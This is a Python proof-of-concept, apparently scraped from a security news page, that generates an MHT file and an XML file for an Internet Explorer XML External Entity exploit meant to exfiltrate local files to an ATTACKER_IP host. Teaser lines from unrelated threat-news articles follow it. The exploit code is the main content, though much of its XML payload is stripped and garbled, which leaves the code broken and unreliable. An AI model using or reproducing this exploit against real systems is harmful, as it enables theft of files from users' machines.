ATTACKER_IP=”localhost”
PORT=”8000″
mht_file=(
‘From:\n’
‘Subject:\n’
‘Date:\n’
‘MIME-Version: 1.0\n’
‘Content-Type: multipart/related; type=”text/html”;\n’
‘\tboundary=”=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001″\n’
‘This is a multi-part message in MIME format.\n\n\n’
‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n’
‘Content-Type: text/html; charset=”UTF-8″\n’
‘Content-Location: main.htm\n\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘MSIE XXE 0day\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘%sp;\n’
‘%param1;\n’
‘]>\n’
‘&exfil;\n’
‘&exfil;\n’
‘&exfil;\n’
‘&exfil;\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘
| \n’ ‘MSIE XML External Entity 0day PoC.\n’ ‘Discovery: hyp3rlinx\n’ ‘ApparitionSec\n’ ‘ |
\n’ ‘\n’ ‘\n\n\n’
‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001–‘
)
xml_file=(
‘\n’
‘”>\n’
‘\n’
‘”>\n’
)
def mk_msie_0day_filez(f,p):
f=open(f,”wb”)
f.write(p)
f.close()
if name == “main“:
mk_msie_0day_filez(“msie-xxe-0day.mht”,mht_file)
mk_msie_0day_filez(“datatears.xml”,xml_file)
print “Microsoft Internet Explorer XML External Entity 0day PoC.”
print “Files msie-xxe-0day.mht and datatears.xml Created!.”
print “Discovery: Hyp3rlinx / Apparition Security”
Credits: John Page (aka hyp3rlinx)
A sophisticated cyber campaign orchestrated by the Chinese Advanced Persistent Threat (APT) group, Silver Fox,…
A new wave of cyberattacks attributed to the Ghostwriter Advanced Persistent Threat (APT) group has…
The LCRYX ransomware, a malicious VBScript-based threat, has re-emerged in February 2025 after its initial…
Recent cybersecurity investigations have uncovered a sophisticated technique employed by threat actors to evade detection…
A financial management app named Finance Simplified has been revealed as a malicious tool for…
A recent discovery by cybersecurity researchers has revealed that the Poseidon malware, a macOS-targeting trojan,…